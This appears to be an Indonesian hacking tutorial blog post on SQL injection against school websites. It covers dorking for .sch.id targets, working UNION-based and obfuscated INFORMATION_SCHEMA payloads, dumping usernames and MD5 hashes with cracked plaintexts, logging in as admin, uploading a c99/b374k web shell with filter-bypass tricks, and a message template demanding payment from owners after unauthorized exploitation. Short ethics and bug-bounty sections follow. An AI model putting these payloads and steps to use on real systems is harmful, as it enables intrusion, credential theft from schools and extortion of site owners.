SQL Injection 2025: Teknik Eksploitasi Parameter untuk Dumping Database dan Kredensial

SQL Injection Ekspolitasi Database SQL Injection tetap menjadi salah satu teknik paling ampuh dalam dunia peretasan, digunakan untuk mengeksploitasi celah yang ada pada aplikasi web yang rentan. Dengan memanfaatkan kelemahan dalam validasi input, seorang peretas bisa menyusup ke dalam sistem dan mengakses informasi penting yang tersembunyi di dalam database. Kerentanannya memungkinkan penyerang untuk mengubah query SQL yang seharusnya hanya mengambil data, menjadi senjata untuk mencuri data sensitif, merusak integritas informasi, atau bahkan mengambil alih kontrol penuh atas sistem.

Pada artikel ini, kita akan mengeksplorasi teknik SQL Injection 2025 dengan fokus khusus pada eksploitasi parameter. Teknik ini memungkinkan seorang peretas untuk menyuntikkan perintah SQL yang berbahaya melalui parameter URL atau form input yang tidak tervalidasi dengan benar. Dengan menggunakan payload yang tepat, seorang hacker dapat mengakses struktur database, melihat tabel dan kolom yang ada, serta mengekspos informasi yang biasanya tersembunyi di balik lapisan keamanan aplikasi web.

Lebih jauh lagi, kita akan membahas bagaimana dumping database dan kredensial pengguna dilakukan dengan menggunakan teknik SQL Injection yang sudah terbukti efektif. Dengan menggabungkan teknik seperti 'UNION SELECT' dan 'GROUP_CONCAT', penyerang dapat mengekstrak data penting seperti nama pengguna dan kata sandi, yang kemudian bisa digunakan untuk melakukan serangan lebih lanjut, termasuk deface atau eskalasi hak akses. Proses ini menunjukkan betapa pentingnya menjaga keamanan parameter input dan memperkuat validasi data pada aplikasi web agar serangan seperti ini tidak dapat terjadi.

1. Apa itu SQL Injection?

SQL Injection adalah teknik serangan yang memungkinkan penyerang untuk menyisipkan perintah SQL yang berbahaya ke dalam query yang dijalankan oleh aplikasi web. Dengan memanfaatkan input yang tidak tervalidasi dengan baik, penyerang dapat mengakses, mengubah, atau menghancurkan data di database.

2. Mengapa Teknik Eksploitasi Parameter Penting?

Dalam dunia SQL Injection, eksploitasi parameter adalah salah satu teknik paling umum yang digunakan. Parameter ini biasanya digunakan untuk mengontrol tampilan data di aplikasi web. Namun, jika parameter ini tidak tervalidasi dengan baik, penyerang bisa mengeksploitasi celah ini untuk mengeksekusi query SQL yang tidak sah.

Contoh Kasus: Bayangkan ada sebuah URL seperti berikut:

https://www.example.com/index.php?id=1

Parameter id ini bisa digunakan untuk mengeksploitasi kerentanannya. Dengan menyuntikkan payload SQL yang berbahaya, penyerang dapat mengambil alih kontrol atas database situs tersebut.

3. Google Reconnaissance - Target Analysis

Sebelum melancarkan serangan SQL Injection, tahap pertama yang perlu dilakukan adalah reconnaissance atau pengumpulan informasi. Salah satu cara yang paling efektif adalah menggunakan Google Dorking, yang memanfaatkan kemampuan pencarian Google untuk menemukan endpoint yang rentan.

(+) Contoh Dorking yang digunakan:

Dorking adalah teknik pencarian lanjutan yang digunakan untuk menemukan informasi sensitif yang tersembunyi di internet. Dengan menggunakan query tertentu di mesin pencari seperti Google, penyerang dapat menemukan halaman login, database terbuka, file konfigurasi, dan informasi lain yang dapat dieksploitasi. Berikut adalah beberapa contoh dorking yang sering digunakan:

site:.sch.id inurl:dashboard filetype:php

Dengan dork ini, kita dapat mencari endpoint yang rentan di situs dengan domain .sch.id, khususnya halaman yang mengandung dashboard dan file PHP. Endpoint seperti ini sering digunakan dalam aplikasi yang memiliki inputan parameter yang tidak aman.

Baca juga : Dorks Bypass admin

(+) Contoh Hasil Dorking Yang Rentan:

Misalnya, hasil pencarian dapat mengarah ke sebuah URL yang terlihat seperti berikut:

https://ppdb.example.sch.id/data.php?modul=link&id=24

Dalam URL di atas, parameter id=24 dapat menjadi titik masuk bagi eksploitasi SQL Injection. Jika endpoint ini tidak memiliki sanitasi input yang memadai, maka penyerang dapat menyisipkan payload SQL untuk mengekstrak informasi sensitif dari database.

Analisis Endpoint:

• site:.sch.id → Menargetkan situs dengan domain .sch.id (biasanya institusi pendidikan).
• inurl:dashboard → Mencari halaman yang mengandung kata "dashboard", yang sering kali merupakan area admin.
• filetype:php → Menyaring hasil pencarian agar hanya menampilkan file berbasis PHP.

Setelah menemukan endpoint yang berpotensi rentan, langkah berikutnya adalah melakukan uji coba dengan berbagai payload SQL Injection untuk mengonfirmasi apakah sistem benar-benar rentan.

4. Menggunakan Koma Atas (') untuk Uji Coba Kerentanan

Langkah pertama dalam eksploitasi SQL Injection adalah menguji apakah parameter tersebut rentan dengan menambahkan koma atas (') pada akhir nilai parameter:

https://ppdb.example.sch.id/data.php?modul=link&id=24'

Mengapa Koma Atas (') Digunakan?

Koma atas (') adalah delimiter SQL yang digunakan untuk menutup string dalam query SQL. Jika halaman web tidak menangani input dengan benar, menambahkan koma atas akan menyebabkan query menjadi tidak valid, sehingga memicu error SQL atau menampilkan output yang berbeda di halaman.

Respon yang mengindikasikan kerentanan:

• Error SQL seperti:

• You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''24''' at line 1

• Halaman kosong atau output berbeda dari biasanya
• Informasi debug terkait database (misalnya, tipe database atau tabel yang digunakan)

Jika salah satu dari tanda-tanda ini muncul, maka kemungkinan besar parameter tersebut rentan terhadap SQL Injection.

5. Menggunakan Operator Komentar (--+-) untuk Manipulasi Query

Setelah mengonfirmasi bahwa parameter id rentan, langkah selanjutnya adalah mengendalikan eksekusi query SQL. Salah satu teknik yang umum digunakan adalah menggunakan operator komentar SQL (--+-) untuk mengabaikan sisa query asli yang mungkin menghambat eksploitasi.

Payload eksploitasi sederhana:

https://ppdb.example.sch.id/data.php?modul=link&id=24'--+-

Bagaimana --+- Bekerja?

• -- → Menandakan komentar SQL, yang berarti semua kode setelahnya akan diabaikan oleh database.
• - → Menandakan akhir dari komentar dan memastikan bahwa query yang ada setelahnya tidak diproses oleh server.
• + → Digunakan untuk encoding URL, memastikan karakter yang digunakan tetap valid dalam query yang dikirim melalui browser.

Dengan teknik ini, penyerang bisa menghindari validasi query bawaan aplikasi dan mulai menyusun payload yang lebih kompleks untuk membaca, memodifikasi, atau bahkan menghapus data dalam database.

6. Menambahkan ORDER BY untuk Mencari Tabel dan Kolom

Setelah berhasil mengabaikan query asli menggunakan operator komentar (--+-), langkah berikutnya adalah untuk menyusun payload yang lebih canggih guna mengekstrak informasi dari database. Salah satu teknik yang digunakan adalah dengan menambahkan klausa ORDER BY untuk mencari kolom atau tabel yang ada di dalam database.

Payload eksploitasi menggunakan ORDER BY:

https://ppdb.example.sch.id/data.php?modul=link&id=24' ORDER BY 1,2,3--+-

Dengan menambahkan ORDER BY pada parameter id, penyerang dapat mencoba untuk mengurutkan hasil query SQL berdasarkan kolom yang ada di dalam tabel database. Nilai angka yang mengikuti ORDER BY menentukan kolom yang akan diperiksa oleh sistem, yang bisa memberikan indikasi tentang struktur database tersebut.

Bagaimana ORDER BY Bekerja?

• ORDER BY → Digunakan untuk mengurutkan hasil query berdasarkan kolom yang ditentukan. Dalam konteks eksploitasi SQL Injection, teknik ini memungkinkan penyerang untuk menemukan tabel dan kolom yang dapat diakses.
• 1 → Angka ini menunjukkan kolom pertama dalam query SQL. Penyerang dapat mengganti angka ini untuk mencoba mengurutkan berdasarkan kolom lain, hingga mereka menemukan yang menghasilkan error atau informasi valid.
• --+- → Menandakan akhir dari query, memastikan bahwa server mengabaikan sisa query setelahnya.

Setelah mengidentifikasi kolom yang valid, penyerang dapat melanjutkan untuk mengakses informasi lebih lanjut, seperti nama tabel dan data sensitif yang ada di dalamnya, menggunakan teknik eksploitasi SQL Injection lebih lanjut.

7. Payload untuk Mengekstrak Skema Database Setelah Menemukan Kerentanan Kolom

Setelah menggunakan teknik ORDER BY untuk menemukan kolom yang valid dalam query SQL, langkah berikutnya adalah menggunakan payload untuk mengekstrak skema database. Misalnya, jika ditemukan bahwa kolom ke-3 menghasilkan output yang valid (atau error yang bermanfaat), maka kita dapat melanjutkan dengan menggabungkan payload eksploitasi untuk mengakses informasi sensitif dari database.

Berikut adalah contoh payload yang dapat digunakan untuk mengekstrak skema database dan informasi tentang tabel serta kolom yang ada di dalamnya:

https://ppdb.example.sch.id/data.php?modul=link&id=24%27union%20select%201,2,(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a)--+-

Penjelasan Payload:

• union select: Digunakan untuk menggabungkan hasil dari query asli dengan query yang disuntikkan, memungkinkan penyerang untuk mendapatkan informasi lebih lanjut dari database.
• from INFORMATION_SCHEMA.COLUMNS: Mengambil informasi tentang kolom-kolom yang ada di dalam tabel database yang ditargetkan, yang berguna untuk menemukan tabel dan kolom sensitif.
• @:=0x00: Mendeklarasikan variabel dalam query SQL untuk menyimpan data sementara, yang mempermudah manipulasi data lebih lanjut.
• CONCAT(@,0x3c62723e5461626c6520466f756e64203a20,TABLE_NAME,0x3a3a,COLUMN_NAME): Menggabungkan nama tabel dan kolom dengan format yang mudah dibaca, di mana 0x3c62723e5461626c6520466f756e64203a20 adalah encoding untuk <bTable Found: .

Dengan payload ini, penyerang dapat mengakses nama tabel dan kolom yang ada di database, memberikan gambaran yang lebih lengkap tentang struktur database dan memungkinkan eksploitasi lebih lanjut. Misalnya, jika hasil dari payload ini menunjukkan bahwa kolom ke-3 berisi nama tabel atau data penting, penyerang dapat melanjutkan dengan mencoba mengeksploitasi kolom tersebut untuk mengakses data sensitif seperti kredensial pengguna atau informasi lainnya.

Jika setelah melakukan injeksi SQL dengan payload yang telah diberikan, tidak ada hasil output yang ditampilkan terkait tabel dan kolom yang ada di database, maka langkah berikutnya adalah menambahkan titik (.) di depan nomor ID pada URL. Ini dapat mempengaruhi cara database memproses query dan memungkinkan output yang diinginkan untuk ditampilkan.

Misalnya, URL asli yang mengandung query SQL seperti berikut:

https://ppdb.example.sch.id/data.php?modul=link&id=24%27union%20select%201,2,(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a)--+-

Jika query ini tidak menghasilkan output, Anda dapat mencoba menambahkan titik (.) di depan nomor ID pada parameter URL seperti berikut:

https://ppdb.example.sch.id/data.php?modul=link&id=.24%27union%20select%201,2,(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a)--+-

Penjelasan:

• id=.24 → Menambahkan titik (.) di depan nomor ID digunakan untuk memanipulasi cara query SQL dijalankan, yang kadang dapat memaksa database untuk mengabaikan validasi atau pengecekan yang lebih ketat terhadap parameter.
• Titik (.) di depan ID berfungsi untuk menghindari error yang sering terjadi ketika database menolak sintaks query yang tidak lengkap, dan dapat membuka jalur untuk melihat hasil query yang lebih akurat.

Dengan menambahkan titik ini, Anda dapat mempengaruhi cara database menafsirkan parameter tersebut dan mengonfirmasi apakah payload SQL Injection dapat dieksekusi dengan sukses untuk mengekstrak informasi yang lebih sensitif, seperti nama tabel dan kolom dalam database.

8. Simulate SQL Injection

Setelah menemukan tabel dan kolom yang dapat dieksploitasi menggunakan SQL Injection, langkah selanjutnya adalah mensimulasikan eksekusi query SQL untuk mengeksploitasi kerentanannya dan mendapatkan data sensitif. Dalam kasus ini, kita akan menyimulasikan hasilnya untuk menunjukkan kepada pemula bagaimana proses eksploitasi ini bekerja.

Misalnya, setelah menggunakan query SQL seperti ORDER BY atau UNION SELECT untuk menemukan tabel yang rentan, jika kita berhasil menemukan tabel yang berisi informasi sensitif, kita dapat melanjutkan untuk mengekstrak data seperti username dan password.

Langkah-langkah yang dilakukan:

• ORDER BY: Menyaring hasil berdasarkan urutan kolom untuk menemukan tabel yang memiliki lebih banyak kolom yang dapat dieksploitasi.
• UNION SELECT: Digunakan untuk menggabungkan hasil dari query asli dengan data yang disuntikkan, yang mengarah pada data sensitif seperti username dan password.

(+) Demo Output Hasil Eksploitasi:

Jika SQL Injection berhasil, kita akan melihat output seperti berikut:

(+) Extracting User Credentials:

Setelah mengetahui tabel dan kolom yang ditemukan seperti hasil contoh simulasi di halaman web seperti demo diatas, kita bisa menambahkan payload yang lebih canggih untuk mengekstrak data, misalnya:

https://ppdb.example.sch.id/data.php?modul=link&id=.24%27union%20select%201,2,group_concat(username,0x3a3a,password)%20from%20user--+-

Payload di atas mencoba untuk mengambil username dan password dari tabel user dan menampilkannya di halaman.

(+) Contoh Hasil Ekstraksi:

Setelah berhasil menemukan tabel yang mengandung data sensitif seperti username dan password, langkah selanjutnya adalah mengekstrak kredensial pengguna yang ada dalam database. Proses ini dilakukan dengan mengakses tabel yang relevan, menggunakan teknik SQL Injection untuk menggabungkan hasil query asli dengan data yang disuntikkan, dan akhirnya mengungkapkan informasi penting yang tersimpan dalam database target.

samuel::5f2ab57c477ac09a136c872944b88d83,admin::0192023a7bbd73250516f069df18b500,bos::a2ed32cae296647110b3dbbf60c3f445

Hasil di atas menunjukkan kredensial pengguna yang berhasil diekstrak dari database target. Setiap entri terdiri dari:

• samuel → Username yang ditemukan dalam database.
• 5f2ab57c477ac09a136c872944b88d83 → Password yang ter-enkripsi menggunakan algoritma hash (kemungkinan MD5 atau SHA-1). Enkripsi ini menggambarkan bagaimana password disimpan dengan cara yang lebih aman di aplikasi, meskipun sebenarnya masih dapat dieksploitasi jika algoritma hashing yang digunakan lemah atau tidak aman.
• admin → Username dengan level akses lebih tinggi, yang biasanya memiliki hak istimewa untuk mengelola sistem atau data penting lainnya.
• 0192023a7bbd73250516f069df18b500 → Password untuk pengguna dengan username admin, juga ter-enkripsi dengan teknik hashing yang memungkinkan untuk dieksploitasi lebih lanjut.
• bos → Username yang merujuk pada posisi kepsek (kepala sekolah), yang mungkin memiliki akses ke data sensitif seperti catatan akademik atau informasi pribadi siswa.
• a2ed32cae296647110b3dbbf60c3f445 → Password untuk pengguna dengan username kepsek, yang juga disimpan dalam bentuk hash, yang dapat dipatahkan jika algoritma hash yang digunakan cukup lemah.

Pentingnya Ekstraksi Kredensial:

Menemukan kredensial pengguna seperti username dan password adalah langkah penting dalam proses eksploitasi, karena ini memberikan penyerang akses langsung ke sistem atau aplikasi. Bahkan jika password disimpan dalam bentuk hash, ini tetap dapat dieksploitasi dengan teknik seperti brute force atau rainbow tables untuk memecahkan enkripsi dan mendapatkan akses yang tidak sah.

Sebagai seorang hacker profesional, penyerang harus memiliki pemahaman mendalam tentang algoritma hashing dan cara-cara mengoptimalkan teknik untuk memperoleh data yang tidak seharusnya mereka miliki. Ini menunjukkan pentingnya penggunaan teknik enkripsi yang lebih aman dan kebijakan pengelolaan kredensial yang lebih ketat untuk mencegah potensi kebocoran data seperti ini.

9. Tools untuk Mengenkripsi dan Mendekripsi Password (Hashing dan Hash Cracking)

Untuk mengatasi password yang terenkripsi (hash), penyerang atau bahkan pengguna yang lupa password dapat menggunakan berbagai tools online untuk mengenkripsi atau mendekripsi hash tersebut. Berikut adalah beberapa alat yang dapat digunakan untuk mengenkripsi atau mencoba untuk memecahkan hash seperti MD5, SHA-1, dan lainnya:

https://www.md5online.org/md5-decrypt.html
https://crackstation.net/
https://www.hashkiller.co.uk/md5-decrypter.asp
https://www.onlinehashcrack.com/
https://www.toolsley.com/hash-cracker/

• MD5 Online: Situs ini memungkinkan pengguna untuk mendekripsi hash MD5 secara gratis. Alat ini sering digunakan oleh para penyerang untuk mencoba memecahkan hash MD5 yang ditemukan dalam database.
• MD5 Hash Generator: Situs ini memungkinkan Anda untuk membuat hash MD5 dari teks atau password apa pun. Ini berguna bagi mereka yang ingin mengenkripsi data dengan algoritma MD5.
• CrackStation: CrackStation adalah salah satu situs yang dapat digunakan untuk mendekripsi berbagai jenis hash seperti MD5, SHA-1, dan SHA-256 secara gratis menggunakan database yang besar.
• HashKiller: Situs ini memungkinkan untuk mendekripsi berbagai jenis hash seperti MD5, SHA-1, dan lainnya. HashKiller adalah salah satu alat yang berguna untuk mencari tahu teks asli di balik hash yang terenkripsi.
• Online Hash Crack: Alat ini dapat digunakan untuk mencoba memecahkan berbagai jenis hash. Anda dapat mengunggah hash Anda untuk melihat apakah bisa dipecahkan menggunakan metode brute force atau dengan bantuan database precomputed hashes.
• Toolsley Hash Cracker: Alat ini mendukung berbagai algoritma hash dan dapat digunakan untuk mendekripsi hash MD5, SHA1, SHA256, dan lainnya secara online. Ini memungkinkan Anda untuk memecahkan hash dengan bantuan algoritma dan teknik cracking yang efektif.

Selain itu, penyerang juga dapat mencoba untuk mem-bypass form login tersebut dengan teknik brute force (untuk mencoba berbagai kombinasi username dan password) atau menggunakan SQL Injection untuk memanipulasi query login dan mendapatkan akses ke akun pengguna atau admin.

10. Mencari Form Login

Setelah menemukan kerentanan di endpoint sebelumnya, langkah selanjutnya adalah mencari form login yang memungkinkan penyerang untuk mengakses sistem. Form login sering menjadi target eksploitasi karena di sinilah pengguna dapat memasukkan kredensial untuk mendapatkan akses ke aplikasi atau website.

(+) Bagaimana Menemukan Form Login?

• inurl:login → Menggunakan query ini di mesin pencari untuk menemukan URL yang mengandung kata "login". Hal ini sangat berguna untuk menargetkan form login di website atau aplikasi web.
• intitle:"login" → Mencari halaman dengan judul "login" di dalam title tag HTML. Ini sering digunakan untuk menemukan halaman login yang terlihat pada hasil pencarian.
• filetype:php → Menyaring hasil pencarian untuk hanya menampilkan file PHP, yang sering digunakan untuk menangani proses login di aplikasi berbasis PHP.
• inurl:admin → Mencari halaman login di area administrasi yang lebih sensitif, seperti dashboard admin.

(+) Cari Form Login dengan Kata Kunci Domain yang Sudah Terkompromi:

Jika Anda sudah menemukan domain yang berhasil di-hack, Anda bisa melanjutkan pencarian form login lebih mendalam dengan menargetkan domain tertentu. Misalnya, jika Anda tahu bahwa domain yang terkompromi adalah www.example.com, Anda bisa mencari form login dengan menggunakan kata kunci seperti:

• www.example.com login → Mencari form login langsung pada domain yang terkompromi.
• www.example.com inurl:login → Mencari halaman login yang terdapat pada URL dari domain yang sudah di-hack.
• www.example.com intitle:"login" → Mencari form login dengan judul halaman "login" di domain yang terkompromi.
• www.example.com inurl:admin → Mencari halaman login di area administrasi atau dashboard yang mungkin rentan.

(+) Menguji Kredensial yang Telah Diperoleh

Setelah menemukan halaman login, langkah selanjutnya adalah mencoba kredensial yang telah diperoleh sebelumnya. Berdasarkan hasil eksploitasi database, kita telah mendapatkan daftar username dan password dalam bentuk hash MD5 yg telah di decrypt:

+-------------------+------------------------+
| Username          | Password               |
+-------------------+------------------------+
| Samuel            | 130977                 |
| Admin             | admin123               |
| Bos               | kepsek123              |
+-------------------+------------------------+

Setelah mendekripsi password, kita bisa mencoba login dengan kredensial yang ditemukan di form login yang telah diidentifikasi.

Baca juga : Kumpulan Perintah John the Ripper untuk Crack Password di Terminal

11. Mengupload Shell Backdoor

Setelah berhasil mengakses halaman login dan masuk sebagai administrator, langkah selanjutnya adalah mencari celah untuk mendapatkan kontrol penuh terhadap server. Salah satu metode yang paling efektif adalah mengupload shell backdoor. Dengan shell ini, seorang hacker dapat menjalankan perintah langsung di server target, mengakses database, atau bahkan mengambil alih sistem sepenuhnya.

Baca juga : Mengenal Shell Backdoor: Cara Kerja dan Dampaknya terhadap Keamanan Siber

(+) Mengidentifikasi Celah Upload File

Jika di dalam panel admin atau halaman yang diakses terdapat form untuk mengupload file, ini bisa menjadi titik masuk yang sangat berharga. Banyak sistem memiliki fitur upload untuk mengunggah gambar, dokumen, atau file lainnya, tetapi tidak semua sistem memiliki validasi yang ketat. Jika sistem tidak memeriksa ekstensi atau jenis file yang diunggah dengan baik, maka shell backdoor dapat dimasukkan dengan mudah.

Contoh Form Upload File yang Rentan:

<form action="upload.php" method="post" enctype="multipart/form-data">
  Pilih file untuk diunggah:
  <input type="file" name="fileToUpload" id="fileToUpload">
  <input type="submit" value="Upload File" name="submit">
</form>

Pada form di atas, jika sistem tidak melakukan validasi terhadap jenis file yang diunggah, seorang hacker dapat mengunggah file PHP yang berisi shell backdoor.

(+) Mengunggah Shell Backdoor

Salah satu shell backdoor yang paling populer adalah c99.php atau b374k.php, yang memberikan akses remote ke server target. Jika sistem rentan, shell dapat diunggah dengan nama file seperti:

c99.php

Jika file berhasil diunggah tanpa filter, hacker bisa mengaksesnya dengan membuka:

https://www.lapbos.example.sch.id/todaks_image/c99.php

Bagaimana Shell Backdoor Bekerja?

• Shell backdoor memungkinkan eksekusi perintah secara remote di server.
• Penyerang dapat mengakses file manager, database, dan bahkan membuat akun baru dalam sistem.
• Beberapa shell memiliki fitur untuk membuka reverse shell, di mana hacker bisa mendapatkan akses langsung ke command-line server.

(+) Teknik Menyembunyikan Shell Backdoor

Jika sistem memiliki validasi file dan hanya mengizinkan file gambar (seperti .jpg atau .png), ada beberapa teknik untuk melewati pembatasan ini:

• Menggunakan ekstensi ganda, seperti shell.php.jpg.
• Menyisipkan kode PHP ke dalam metadata gambar menggunakan ExifTool.
• Mengunggah shell dalam format .htaccess untuk mengaktifkan eksekusi skrip.

(+) Langkah Selanjutnya:

Setelah berhasil mengupload dan mengakses shell backdoor, hacker dapat:

• Membaca dan mencuri file konfigurasi yang berisi kredensial database (config.php).
• Menjalankan perintah sistem seperti ls, cat /etc/passwd, atau whoami.
• Membuka koneksi reverse shell untuk akses penuh ke server.

Dengan langkah ini, seorang hacker dapat mengendalikan sistem secara penuh, yang menandai tahap akhir dari eksploitasi sebelum melanjutkan ke fase privilege escalation atau persistence attack.

Seorang hacker profesional yang etis tidak akan menjual kode shell backdoor kepada orang lain, karena tindakan tersebut sangat tidak etis, ilegal, dan dapat menyebabkan kerusakan besar pada sistem dan individu lainnya. Menjual atau membuat kode untuk eksploitasi semacam itu melanggar hukum dan dapat berujung pada konsekuensi hukum yang serius, termasuk hukuman penjara dan denda.

Seorang ethical hacker (hacker etis) bertujuan untuk mengidentifikasi dan mengatasi kerentanannya dalam sistem dengan izin eksplisit dari pemilik sistem tersebut. Tugas utama mereka adalah membantu organisasi mengamankan sistem mereka, bukan mengeksploitasi kelemahan mereka. Kode yang dibuat untuk tujuan eksploitasi dapat digunakan oleh pihak yang tidak bertanggung jawab untuk merusak sistem atau mencuri data.

12. Memberitahu Pemilik Sistem untuk Mendapatkan Penghasilan

Setelah berhasil mengidentifikasi dan mengeksploitasi kerentanannya, langkah selanjutnya adalah memberitahu pemilik sistem tentang celah yang ditemukan. Namun, perlu diingat bahwa pada titik ini, seorang hacker profesional akan memiliki peluang untuk mendapatkan penghasilan dari kerentanannya yang ditemukan, jika dilakukan dengan pendekatan yang tepat.

(+) Melaporkan Kerentanannya Secara Profesional

Seorang hacker yang etis, atau yang dikenal dengan sebutan white hat hacker, dapat melaporkan temuan ini kepada pemilik sistem. Hal ini dilakukan dengan cara yang sangat hati-hati dan profesional. Laporan tersebut harus menyertakan rincian lengkap mengenai celah yang ditemukan, serta bukti atau demonstrasi bahwa celah tersebut benar-benar dapat dieksploitasi. Selain itu, sangat disarankan untuk menyarankan perbaikan atau solusi untuk menutup kerentanannya.

Contoh Pesan yang Dikirim ke Pemilik Sistem:

Subjek: Laporan Kerentanannya di Sistem Anda

Salam,

Saya telah menemukan kerentanannya di sistem Anda yang memungkinkan eksekusi perintah dari jarak jauh. Hal ini dapat digunakan oleh pihak yang tidak bertanggung jawab untuk mengakses data sensitif dan mengambil alih kontrol server Anda.

Berikut adalah rinciannya:
- Deskripsi Kerentanan: [Penjelasan kerentanan]
- Lokasi Kerentanan: [URL atau endpoint yang terpengaruh]
- Bukti: [Tautan atau skrip yang dapat digunakan untuk mengeksploitasi kerentanan]

Saya akan senang membantu Anda dalam menutup kerentanan ini dengan langkah-langkah perbaikan yang tepat. Namun, mohon dicatat bahwa saya meminta kompensasi untuk laporan ini. Keamanan adalah hal yang penting, dan Anda perlu segera menutup celah ini untuk menghindari potensi kerugian lebih lanjut.

Hormat saya,
[Your Name / Handle]

Jika pemilik sistem setuju untuk membayar dan menerima laporan ini, maka hacker akan diberikan imbalan yang sesuai. Sebaliknya, jika laporan tidak direspons, atau jika pemilik sistem tidak siap untuk mengatasi masalah ini, hacker harus siap untuk memutuskan apakah akan melaporkan kerentanannya lebih lanjut atau mengabaikan laporan tersebut untuk sementara waktu.

(+) Model Bisnis "Bounty Hunting":

Beberapa perusahaan menawarkan program bug bounty di mana mereka membayar para hacker yang menemukan dan melaporkan kerentanannya. Program ini tidak hanya memberi penghargaan pada hacker yang menemukan celah, tetapi juga memberikan rasa aman bagi pemilik sistem karena masalah ini dapat diperbaiki sebelum dieksploitasi oleh hacker jahat.

Program bug bounty adalah cara yang sah dan legal untuk mendapatkan penghasilan sebagai seorang hacker atau peneliti keamanan. Dalam program ini, Anda akan bekerja sama dengan perusahaan-perusahaan besar untuk membantu mereka memperbaiki kelemahan dalam sistem mereka. Banyak situs yang menawarkan program bug bounty yang memungkinkan Anda untuk mendapatkan imbalan atas kontribusi Anda dalam meningkatkan keamanan dunia maya.

(-) Situs-Situs Bug Bounty Terbaik di 2025:

Berikut adalah beberapa platform terkemuka yang menawarkan program bug bounty yang sah dan legal, di mana Anda bisa mendapatkan penghasilan pada tahun 2025:

• HackerOne: Salah satu platform bug bounty terbesar yang bekerja dengan perusahaan besar seperti Uber, GitHub, dan Twitter. HackerOne menawarkan berbagai program bug bounty di berbagai tingkat kesulitan dan hadiah yang menguntungkan.
• Bugcrowd: Bugcrowd adalah platform terkenal lainnya yang menghubungkan hacker dengan perusahaan besar. Program bug bounty di Bugcrowd juga mencakup sektor-sektor yang beragam seperti e-commerce, finansial, dan teknologi.
• Synack: Menawarkan program bug bounty yang lebih terkontrol dan eksklusif. Anda akan diundang untuk bergabung dengan Synack jika Anda telah menunjukkan kemampuan dalam pengujian penetrasi dan keamanan dunia maya.
• Open Bug Bounty: Platform ini memungkinkan Anda untuk melaporkan kerentanannya secara gratis dan menerima imbalan. Mereka lebih berfokus pada website yang berisiko tinggi dan menerima laporan dari siapa saja yang menemukan celah.
• YesWeHack: Platform bug bounty yang menghubungkan para hacker dengan lebih dari 500 perusahaan global. Mereka menyediakan berbagai jenis hadiah berdasarkan kerentanannya yang ditemukan.
• Intigriti: Intigriti memberikan kesempatan untuk bekerja dengan berbagai perusahaan Eropa dan menawarkan berbagai program bug bounty. Mereka juga dikenal dengan transparansi dan hadiah yang menguntungkan.
• Google Vulnerability Reward Program (VRP): Google memiliki program bug bounty yang memberikan penghargaan kepada peneliti yang menemukan kerentanannya pada produk Google, termasuk Android, Google Cloud, dan lainnya. Google VRP adalah salah satu program bug bounty paling terkemuka.
• Facebook Bug Bounty: Facebook menawarkan program bug bounty yang membayar peneliti keamanan untuk menemukan celah di platform mereka, termasuk Instagram dan WhatsApp. Program ini telah ada sejak 2011 dan memberikan penghargaan yang signifikan.
• GitHub Security Bug Bounty: Sebagai platform pengembangan kode terbesar, GitHub memiliki program bug bounty yang memberi penghargaan bagi mereka yang menemukan kerentanannya dalam aplikasi dan sistem GitHub.
• Microsoft Bug Bounty Program: Microsoft juga memiliki program bug bounty yang membayar peneliti untuk menemukan kerentanannya di produk mereka, termasuk Windows, Office, dan Azure.

(-) Keuntungan Bergabung dengan Program Bug Bounty:

• Penghasilan Tambahan: Anda bisa mendapatkan penghasilan yang signifikan dengan menemukan dan melaporkan kerentanannya pada sistem yang terdaftar di platform-program tersebut.
• Pengembangan Keahlian: Program bug bounty memungkinkan Anda untuk mengasah kemampuan dan pengetahuan di bidang keamanan dunia maya dengan bekerja pada tantangan nyata.
• Pengalaman Profesional: Bergabung dengan program ini memberikan pengalaman langsung yang berharga, yang bisa menjadi portofolio yang kuat untuk karir Anda di bidang cybersecurity.
• Mendapat Penghargaan dan Pengakuan: Selain penghasilan, Anda juga akan mendapatkan penghargaan dan pengakuan dari perusahaan besar yang berterima kasih atas kontribusi Anda dalam meningkatkan keamanan mereka.

(-) Bagaimana Cara Mulai Bergabung?

Untuk mulai berpartisipasi dalam program bug bounty, Anda hanya perlu mendaftar di salah satu platform di atas, memahami aturan dan kebijakan mereka, serta mulai mencari dan melaporkan kerentanannya dengan benar. Banyak platform menyediakan pelatihan dan tutorial untuk membantu Anda memulai.

Dengan keterampilan yang tepat dan dedikasi, program bug bounty bisa menjadi cara yang menguntungkan untuk mendapatkan penghasilan sambil berkontribusi pada dunia keamanan dunia maya yang lebih aman.

(+) Perhatian untuk Pemilik Sistem yang Tidak Responsif

Dalam beberapa kasus, pemilik sistem atau administrator mungkin tidak memberikan tanggapan yang memadai terhadap laporan kerentanan yang disampaikan. Ketidaktertarikan atau kelambanan dalam menangani masalah ini dapat menyebabkan kerentanannya tetap terbuka dan menjadi celah yang dapat dimanfaatkan oleh pihak yang tidak bertanggung jawab. Jika celah tersebut dibiarkan tanpa perbaikan, hacker yang berniat jahat dapat dengan mudah mengeksploitasi kerentanannya, yang pada akhirnya dapat menyebabkan kerugian finansial, kebocoran data, dan reputasi yang hancur bagi pemilik sistem.

